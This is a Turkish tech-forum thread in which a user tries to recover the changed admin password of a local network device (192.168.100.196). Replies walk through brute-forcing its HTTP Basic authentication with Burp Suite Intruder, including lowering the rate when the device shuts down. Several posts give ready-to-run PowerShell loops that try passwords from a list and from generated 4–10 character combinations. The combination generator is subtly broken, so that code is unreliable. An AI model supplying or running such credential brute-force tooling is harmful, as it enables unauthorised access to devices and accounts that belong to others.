Chrome Üzerinden Şifre Bulma
-
Silvanus bunu yazdı
Hocam bi liste oluşturacaksın, chatgptye bunu yaptıran bi python program yazdırabilirsin. Mesela 8 karakter olacak şekilde harf ve rakamlardan oluşacak tüm ihtimalleri bi txt ye kaydedeceksin. Bunun en temizi parola ile ilgili hatırladığım bi ayrıntı varsa bunu da söyle chatgptye ihtimal azaltsın. Sonr burp suite kurup bi tarayıcıya bunu proxy gireceksin. Firefox da basit olur bu işlem. Sonra paltforma giden get isteğini burp suite içerisinde intruder tool u var, o tool ile her parola için Authorization: Basic am9obkBleGFtcGxlLmNvbTphYmMxMjM= buna benzeyen bir header ekleyip tek tek request atacak. Response kodu 200 dönerse veya diğerlerinden farklı bir response dönerse bilki parolayı buldun. Burdaki değer username:password değerinin base64 encoded hali. Chatgpt ye bunu da söyle listeyi senin verdiğin username ile password ihtimali kombinasyonlarını oluşturup başına Authorization: Basic ekleyerek bi txt çıkarsın. İntruder da bu dosyayı input verip başlatabilirsin. Cihaz kendini kapatabilir ama çok requestte, o zaman da rate limit düşürüp denersin. Ama ihtimalleri azaltamazsan eğer haftalarca çalışır gene de bulamayabilirsin. Ben olsam böyle bulurdum.
Biraz karışık anlattıysam hakkını helal et. Sen derdini chatgpt ye anlat sonra benim yazdığımı yapıştır o daha güzel anlatır :)
-
Silvanus bunu yazdıSilvanus bunu yazdı
Hocam bi liste oluşturacaksın, chatgptye bunu yaptıran bi python program yazdırabilirsin. Mesela 8 karakter olacak şekilde harf ve rakamlardan oluşacak tüm ihtimalleri bi txt ye kaydedeceksin. Bunun en temizi parola ile ilgili hatırladığım bi ayrıntı varsa bunu da söyle chatgptye ihtimal azaltsın. Sonr burp suite kurup bi tarayıcıya bunu proxy gireceksin. Firefox da basit olur bu işlem. Sonra paltforma giden get isteğini burp suite içerisinde intruder tool u var, o tool ile her parola için Authorization: Basic am9obkBleGFtcGxlLmNvbTphYmMxMjM= buna benzeyen bir header ekleyip tek tek request atacak. Response kodu 200 dönerse veya diğerlerinden farklı bir response dönerse bilki parolayı buldun. Burdaki değer username:password değerinin base64 encoded hali. Chatgpt ye bunu da söyle listeyi senin verdiğin username ile password ihtimali kombinasyonlarını oluşturup başına Authorization: Basic ekleyerek bi txt çıkarsın. İntruder da bu dosyayı input verip başlatabilirsin. Cihaz kendini kapatabilir ama çok requestte, o zaman da rate limit düşürüp denersin. Ama ihtimalleri azaltamazsan eğer haftalarca çalışır gene de bulamayabilirsin. Ben olsam böyle bulurdum.
Biraz karışık anlattıysam hakkını helal et. Sen derdini chatgpt ye anlat sonra benim yazdığımı yapıştır o daha güzel anlatır :)
Denicem hocam çok sağol
Yazılım konusunda fazla bilgim yok ama halledicem İnş
-
brute force nasıl yaparım bunun bir programı var mı acaba
http://admin:"şifre"@192.168.100.196/admin/net.shtml
sorgusu ile şifreyi sayı harf ve karakter kombinasyonlarını deneyip sorgu yapan bir şey nasıl yapılır
-
hypnot1c bunu yazdı
O bahsettiğin şifre tahmin eklentisinde belki linke göre denemede yapıyor olabilir. Tek bir satırla şu şekilde de bağlanıyor olman lazım. Belki fikir verir. Örnek;
http://user:password@adress
dediğin şekilde şifre ekranına ulaştım ama bu sorguyu otomatik yaptırabilecek bir program var mı acaba
http://admin:şifre@192.168.100.196/admin/net.shtml
-
34sileli bunu yazdıhypnot1c bunu yazdı
dediğin şekilde şifre ekranına ulaştım ama bu sorguyu otomatik yaptırabilecek bir program var mı acaba
http://admin:şifre@192.168.100.196/admin/net.shtml
$url = "http://192.168.100.196/admin/net.shtml" $username = "admin" $passwordFile = "C:\path\to\passwords.txt" $passwords = Get-Content -Path $passwordFile foreach ($password in $passwords) { try { # Create a credential object $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword # Attempt to access the URL with the current password $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop Write-Host "Success! Password is: $password" break } catch { next password Write-Host "Failed with password: $password" } }
C:\path\to\passwords.txt yerine parola listesinin olduğu text dosyası hazırlayıp yolunu göstereceksin. Yukarıdaki kodu not defterine kopyalayıp dosya uzantısını .ps1 olarak kaydet. Powershell ISE açıp kaydettiğin ps1 dosyasını yükleyip çalıştır
-
JpnTr bunu yazdı34sileli bunu yazdıhypnot1c bunu yazdı
dediğin şekilde şifre ekranına ulaştım ama bu sorguyu otomatik yaptırabilecek bir program var mı acaba
http://admin:şifre@192.168.100.196/admin/net.shtml
$url = "http://192.168.100.196/admin/net.shtml" $username = "admin" $passwordFile = "C:\path\to\passwords.txt" $passwords = Get-Content -Path $passwordFile foreach ($password in $passwords) { try { # Create a credential object $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword # Attempt to access the URL with the current password $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop Write-Host "Success! Password is: $password" break } catch { next password Write-Host "Failed with password: $password" } }
C:\path\to\passwords.txt yerine parola listesinin olduğu text dosyası hazırlayıp yolunu göstereceksin. Yukarıdaki kodu not defterine kopyalayıp dosya uzantısını .ps1 olarak kaydet. Powershell ISE açıp kaydettiğin ps1 dosyasını yükleyip çalıştır
Sağol hocam dediğin şekilde benim belirlediğim 2 haneli şifreyi buldu. şifreleri içeren text dosyası oluşturuyorum şuan. Bu dosyanın içerisinde sayı, harf ve karakter içeren ve 10 haneye kadar olan olasılıkları çıkarıyorum. Çok uzun süreceğe benziyor ama en azından firmadan cevap gelene kadar denemek istedim.
Bir soru daha sormak istiyorum, olasılıkları daha kısa sürede nasıl çıkarabileceğim bir yol var mı acaba
Edit
Hocam olasılıkları metin belgesine yazmak yerine 10 hane olacak şekilde ve 4. Haneden sayı ile başlayan harf ve karakter içeren sorguyu nasıl sordurabilirim
34sileli tarafından 13/Mar/25 14:30 tarihinde düzenlenmiştir -
benim anladığım şifre chrome'da kayıtlı değil mi? öncelikle passwords.google.com 'u denediniz mi?
Sonrasında da şunu denediniz mi?

password'u silip yerine text yazıyorsun ve enter'a basınca taa daaaaa.

tabi tüm olayı g*tümden anlamış da olabilirim emin değilim.
En kötü yazılımcı onarımcı dükkanlar oluyor onlar karttan non volatile rami söküp içindekileri okuyup da direk şifreyi de öğrenebilir? olayın adı neydi unuttum valla beynim bi dünya şu an... -
SweetyVolty bunu yazdı
benim anladığım şifre chrome'da kayıtlı değil mi? öncelikle passwords.google.com 'u denediniz mi?
Sonrasında da şunu denediniz mi?

password'u silip yerine text yazıyorsun ve enter'a basınca taa daaaaa.

tabi tüm olayı g*tümden anlamış da olabilirim emin değilim.
En kötü yazılımcı onarımcı dükkanlar oluyor onlar karttan non volatile rami söküp içindekileri okuyup da direk şifreyi de öğrenebilir? olayın adı neydi unuttum valla beynim bi dünya şu an...Yok hocam tam olarak öyle değil, Google da kayıtlı fakat kayıtlı şifre doğru değil. Cihazın şifresini başka biri değiştirmiş ve yeni şifreyi bulmak için üstteki arkadaşların cevap verdiği gibi brute force yapmam gerekiyormuş. Bunu araştırdım ama şifre 10 hane olsa büyük küçük harf, sayı ve karakter olsa ebesinin ki kadar sorgu ve zaman gerekiyor. Yani zor ama şuan için denemekten başka yapacağım bir şey yok. Firma destek verene kadar.
-
4 ila 10 hane arasındaki parolaları otomatik deneme için bu işini görür
$url = "http://192.168.100.196/admin/net.shtml" $username = "admin" # Function to generate all combinations of letters and numbers of a given length function Generate-Combinations { param ( [int]$Length ) $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" $combinations = @() # Generate all possible combinations of the given length $combinations = $chars.ToCharArray() | ForEach-Object { if ($Length -eq 1) { $_ } else { $subCombinations = Generate-Combinations -Length ($Length - 1) $subCombinations | ForEach-Object { $_ + $_ } } } return $combinations } # Generate combinations from 4 to 10 characters for ($i = 4; $i -le 10; $i++) { $combinations = Generate-Combinations -Length $i foreach ($password in $combinations) { try { # Create a credential object $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword # Attempt to access the URL with the current password $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop Write-Host "Success! Password is: $password" return } catch { Write-Host "Failed with password: $password" } } } -
JpnTr bunu yazdı
4 ila 10 hane arasındaki parolaları otomatik deneme için bu işini görür
$url = "http://192.168.100.196/admin/net.shtml" $username = "admin" # Function to generate all combinations of letters and numbers of a given length function Generate-Combinations { param ( [int]$Length ) $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" $combinations = @() # Generate all possible combinations of the given length $combinations = $chars.ToCharArray() | ForEach-Object { if ($Length -eq 1) { $_ } else { $subCombinations = Generate-Combinations -Length ($Length - 1) $subCombinations | ForEach-Object { $_ + $_ } } } return $combinations } # Generate combinations from 4 to 10 characters for ($i = 4; $i -le 10; $i++) { $combinations = Generate-Combinations -Length $i foreach ($password in $combinations) { try { # Create a credential object $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $securePassword # Attempt to access the URL with the current password $response = Invoke-WebRequest -Uri $url -Credential $credential -ErrorAction Stop Write-Host "Success! Password is: $password" return } catch { Write-Host "Failed with password: $password" } } }sağol hocam deneyeceğim ama zor gibi gibi
